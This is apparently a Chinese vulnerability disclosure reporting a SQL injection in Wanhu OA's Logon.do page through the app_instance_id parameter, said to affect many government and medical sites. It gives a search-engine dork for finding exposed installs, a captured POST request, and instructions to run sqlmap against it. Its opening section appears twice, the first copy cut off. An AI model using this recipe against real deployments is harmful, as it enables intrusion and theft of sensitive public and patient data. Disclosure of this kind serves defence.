### 简要描述: 万户OA某页面通用性SQL注入(影响N个政府网和医疗机构) ### 详细说明: defaultroot/Logon.do 该页面存在越权访问,由于app_instance_id参数过滤不严,导致了SQL注入的产生 问题参数:app_instance_id EXP:defaultroot/Logon.do 利用方法:访问该页面,输入任意内容,抓包获取,SQLMAP跑之~~~ 涉及案例: **.**.**.**:7001/defaultroot/aep/login.jsp http://**.**.**.**/defaultroot/aep/login.jsp http://**.**.**.**:7001/defaultroot/Logon.do **.**.**.**:7001/defaultroot/aep/login.jsp 百度搜索到的: https://**.**.**.**/s?wd=inurl%3Adefaultroot%2F&rsv_spt=1&issp=1&f=8&rsv_bp=0&rsv_idx=2&ie=utf-8&tn=baiduhome_pg&rsv_enter=1&rsv_sug3=5&rsv_sug1=4&rsv_n=2&rsv_sug2=0&inputT=2953&rsv_sug4=2953 ----------------------------------------POST---------------------------------- POST /defaultroot/Logon.do HTTP/1.1 Host: **.**.**.**:7001 Connection: keep-alive Content-Length: 41 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Origin: **.**.**.**:7001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95...
### 简要描述: 万户OA某页面通用性SQL注入(影响N个政府网和医疗机构) ### 详细说明: defaultroot/Logon.do 该页面存在越权访问,由于app_instance_id参数过滤不严,导致了SQL注入的产生 问题参数:app_instance_id EXP:defaultroot/Logon.do 利用方法:访问该页面,输入任意内容,抓包获取,SQLMAP跑之~~~ 涉及案例: **.**.**.**:7001/defaultroot/aep/login.jsp http://**.**.**.**/defaultroot/aep/login.jsp http://**.**.**.**:7001/defaultroot/Logon.do **.**.**.**:7001/defaultroot/aep/login.jsp 百度搜索到的: https://**.**.**.**/s?wd=inurl%3Adefaultroot%2F&rsv_spt=1&issp=1&f=8&rsv_bp=0&rsv_idx=2&ie=utf-8&tn=baiduhome_pg&rsv_enter=1&rsv_sug3=5&rsv_sug1=4&rsv_n=2&rsv_sug2=0&inputT=2953&rsv_sug4=2953 ----------------------------------------POST---------------------------------- POST /defaultroot/Logon.do HTTP/1.1 Host: **.**.**.**:7001 Connection: keep-alive Content-Length: 41 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Origin: **.**.**.**:7001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36 SE 2.X MetaSr 1.0 Content-Type: application/x-www-form-urlencoded Referer: **.**.**.**:7001/defaultroot/aep/login.jsp Accept-Encoding: gzip,deflate,sdch Accept-Language: zh-CN,zh;q=0.8 Cookie: LocLan=zh_cn; JSESSIONID=Gp2TVdvDF7Yf2VdJNKC8Ql62vFJLZbfXqQ3LwhZp75XfSGQb1pCn!-1516176646; ezofficeUserName=; ezofficeDomainAccount=whir app_instance_id=11&user_id=111&userType=0 ----------------------------------------POST---------------------------------- [<img src="https://images.seebug.org/upload/201508/261144590688d6513ace327f7b9dd8356b3fac09.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/261144590688d6513ace327f7b9dd8356b3fac09.jpg) [<img src="https://images.seebug.org/upload/201508/2611451207ae12e86948e42e82d06da24575b4c2.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/2611451207ae12e86948e42e82d06da24575b4c2.jpg) [<img src="https://images.seebug.org/upload/201508/2611455962b7b1a66b9b31c809312885ff2ca1ae.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/2611455962b7b1a66b9b31c809312885ff2ca1ae.jpg) ### 漏洞证明: 上面有~~
